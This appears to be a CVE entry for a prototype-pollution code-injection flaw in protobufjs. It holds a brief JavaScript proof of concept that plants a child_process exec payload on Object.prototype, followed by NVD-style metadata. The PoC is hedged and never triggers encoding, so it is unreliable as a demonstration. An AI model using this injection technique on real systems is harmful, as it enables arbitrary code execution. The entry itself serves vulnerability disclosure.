CVE-2026-44291

// PoC for CVE-2026-44291: Prototype Pollution leading to Code Injection // 1. Simulate prototype pollution in the environment Object.prototype.maliciousType = "require('child_process').exec('calc.exe')"; // 2. Initialize protobufjs (assuming a vulnerable version < 7.5.6 or < 8.0.2) const protobuf = require("protobufjs"); // 3. Define a schema that triggers the internal lookup const schema = "message MyMessage { optional string data = 1; }"; // 4. Parse and attempt to generate code const root = protobuf.parse(schema).root; const Message = root.lookupType("MyMessage"); // In a vulnerable scenario, the code generation logic might incorporate // the polluted property 'maliciousType' into the output function, // leading to execution of the payload when the message is encoded/decoded. console.log("If vulnerable, the generated code might reference the polluted prototype property."); // Cleanup delete Object.prototype.maliciousType;

{"cve": {"id": "CVE-2026-44291", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:55.987", "lastModified": "2026-05-14T12:22:14.937", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.6 and 8.0.2, protobufjs used plain objects with inherited prototypes for internal type lookup tables used by generated encode and decode functions. If Object.prototype had already been polluted, those lookup tables could resolve attacker-controlled inherited properties as valid protobuf type information. This could cause attacker-controlled strings to be emitted into generated JavaScript code. This vulnerability is fixed in 7.5.6 and 8.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:protobufjs_project:protobufjs:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "7.5.6", "matchCriteriaId": "BC190A12-59A1-4DEF-A65D-E4216ED5B807"}, {"vulnerable": true, "criteria": "cpe:2.3:a:protobufjs_project:protobufjs:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "734292AA-F3B2-4E3E-9FA2-0EBA7AB0BB45"}]}]}], "references": [{"url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-75px-5xx7-5xc7", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}